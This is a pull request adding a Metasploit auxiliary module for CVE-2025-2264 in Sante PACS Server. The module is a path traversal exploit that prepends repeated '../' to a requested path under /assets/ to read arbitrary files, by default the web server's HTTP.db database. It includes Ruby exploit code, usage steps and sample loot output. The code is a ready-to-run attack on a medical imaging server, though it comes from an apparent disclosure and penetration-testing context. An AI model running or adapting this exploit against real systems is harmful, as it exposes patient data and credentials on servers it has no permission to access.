### PR TITLE
Sante PACS Server Path Traversal (CVE-2025-2264) Module

### DIFF
--- a/documentation/modules/auxiliary/gather/pacsserver_traversal.md
+++ b/documentation/modules/auxiliary/gather/pacsserver_traversal.md
@@ -1,0 +1,68 @@
+## Vulnerable Application
+
+This module exploits a path traversal vulnerability in Sante PACS Server <= v4.1.0 (CVE-2025-2264) to read arbitrary files from the system.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://www.santesoft.com/win/sante-pacs-server/download.html).
+
+By default, the server listens on TCP port 3000 on all network interfaces.
+
+**Successfully tested on**
+
+- Sante PACS Server v4.1.0 on Windows 22H2
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/gather/pacsserver_traversal
+msf6 auxiliary(gather/pacsserver_traversal) > set RHOSTS <IP>
+msf6 auxiliary(gather/pacsserver_traversal) > run
+```
+
+This should return the database for the web server. Any files retrieved will
+be stored as loot.
+
+## Options
+
+### FILE
+The file to be retrieved from the file system. By default, this is the database for the web server, HTTP.db. However, any arbitrary
+file can be specified.
+
+Example: /.HTTP/HTTP.db
+
+### DEPTH
+The traversal depth. The FILE path will be prepended with /assets/ + ../ * DEPTH.
+
+## Scenarios
+
+Running the exploit against v4.1.0 on Windows 22H22 should result in an output similar to the following:
+
+```
+msf6 auxiliary(gather/pacsserver_traversal) > run
+[*] Running module against 192.168.137.217
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[+] File retrieved: /assets/../../.HTTP/HTTP.db
+[*] File saved as loot.
+[*] Auxiliary module execution completed
+
+```
+
+The file will be stored as loot:
+
+```
+msf6 auxiliary(gather/upsmon_traversal) > loot
+
+Loot
+====
+
+host             service  type                         name                                 content     info                                               path
+----             -------  ----                         ----                                 -------     ----                                               ----
+192.168.137.217           pacsserver.file              /.HTTP/HTTP.db                       text/plain  File retrieved through PACS Server path traversal.  /home/foo/.msf4/loot/20250502165539_default_192.168.137.217_pacsserver.file_594385.txt
+```

--- a/modules/auxiliary/gather/pacsserver_traversal.rb
+++ b/modules/auxiliary/gather/pacsserver_traversal.rb
@@ -64,9 +64,8 @@ class MetasploitModule < Msf::Auxiliary
         return CheckCode::Detected('Sante PACS Server PG seems to be running on the server.')
       end
 
-      return CheckCode::Safe
     end
-    return CheckCode::Unknown
+    return CheckCode::Safe
   end
 
   def run

--- a/modules/auxiliary/gather/pacsserver_traversal.rb
+++ b/modules/auxiliary/gather/pacsserver_traversal.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
       return CheckCode::Unknown('Connection failed')
     end
 
-    if res && res.code == 200
+    if res&.code == 200
       data = res.to_s
       if data.include?('Sante PACS Server PG')
         return CheckCode::Detected('Sante PACS Server PG seems to be running on the server.')
@@ -77,8 +77,7 @@ class MetasploitModule < Msf::Auxiliary
       'uri' => normalize_uri(target_uri.path, 'assets', traversal)
     })
 
-    fail_with(Failure::Unknown, 'No response from server.') if res.nil?
-    fail_with(Failure::UnexpectedReply, 'Non-200 returned from server. If you believe the path is correct, try increasing the path traversal depth.') if res.code != 200
+    fail_with(Failure::UnexpectedReply, 'Non-200 returned from server. If you believe the path is correct, try increasing the path traversal depth.') if res&.code != 200
     print_good("File retrieved: #{target_uri.path}assets/#{traversal}")
 
     path = store_loot('pacsserver.file', 'text/plain', datastore['RHOSTS'], res.body, datastore['FILE'], 'File retrieved through PACS Server path traversal.')

--- a/modules/auxiliary/gather/pacsserver_traversal.rb
+++ b/modules/auxiliary/gather/pacsserver_traversal.rb
@@ -1,0 +1,83 @@
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  prepend Msf::Exploit::Remote::AutoCheck
+  CheckCode = Exploit::CheckCode
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Sante PACS Server Path Traversal (CVE-2025-2264)',
+        'Description' => %q{
+          This module exploits a path traversal vulnerability (CVE-2025-2264) in Sante PACS Server <= v4.1.0 to retrieve arbitrary files from the system.
+        },
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'Tenable' # Discovery and PoC
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-2264'],
+          ['URL', 'https://www.tenable.com/security/research/tra-2025-08']
+        ],
+        'DisclosureDate' => '2025-03-13',
+        'DefaultOptions' => {
+          'RPORT' => 3000,
+          'SSL' => 'False'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for PACS Server', '/']),
+        OptString.new('FILE', [false, 'The file path to read from the target system.', '/.HTTP/HTTP.db']),
+        OptInt.new('DEPTH', [ true, 'The traversal depth. The FILE path will be prepended with ../ * DEPTH', 3 ])
+      ]
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'index.html ')
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      return CheckCode::Unknown
+    end
+
+    if res && res.code == 200
+      data = res.to_s
+      if data.include?('Sante PACS Server PG')
+        vprint_status('Sante PACS Server PG seems to be running on the server.')
+        return CheckCode::Detected
+      end
+      return CheckCode::Safe
+    end
+    return CheckCode::Unknown
+  end
+
+  def run
+    traversal = '../' * datastore['DEPTH'] + datastore['FILE']
+    traversal = traversal.gsub(%r{/+}, '/')
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'assets', traversal)
+    })
+
+    fail_with(Failure::Unknown, 'No response from server.') if res.nil?
+    fail_with(Failure::UnexpectedReply, 'Non-200 returned from server. If you believe the path is correct, try increasing the path traversal depth.') if res.code != 200
+    print_good("File retrieved: /assets/#{traversal}")
+
+    store_loot('pacsserver.file', 'text/plain', datastore['RHOSTS'], res.body, datastore['FILE'], 'File retrieved through PACS Server path traversal.')
+    print_status('File saved as loot.')
+  end
+end


### PR DESCRIPTION
This module exploits a path traversal vulnerability (CVE-2025-2264) in Sante PACS Server <= v4.1.0  to retrieve arbitrary files from the server. 

## Verification Steps

1. The software can be obtained from
[the vendor](https://www.santesoft.com/win/sante-pacs-server/download.html).
2. Install the application, restart the system, and run the application
3. Start `msfconsole`
4. msf6 > `use auxiliary/gather/pacsserver_traversal`
5. msf6 auxiliary(gather/pacsserver_traversal) > `set RHOSTS <IP>`
6. msf6 auxiliary(gather/pacsserver_traversal) > `run`


Example output:
```
msf6 auxiliary(gather/pacsserver_traversal) > run
[*] Running module against 192.168.137.217

[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[+] File retrieved: /assets/../../.HTTP/HTTP.db
[*] File saved as loot.
[*] Auxiliary module execution completed
```

The file will be stored as loot:

```
msf6 auxiliary(gather/upsmon_traversal) > loot

Loot
====

host             service  type                         name                                 content     info                                               path
----             -------  ----                         ----                                 -------     ----                                               ----
192.168.137.217           pacsserver.file              /.HTTP/HTTP.db                       text/plain  File retrieved through PACS Server path traversal.  /home/foo/.msf4/loot/20250502165539_default_192.168.137.217_pacsserver.file_594385.txt
```

**Successfully tested on**

- Sante PACS Server v4.1.0 on Windows 22H2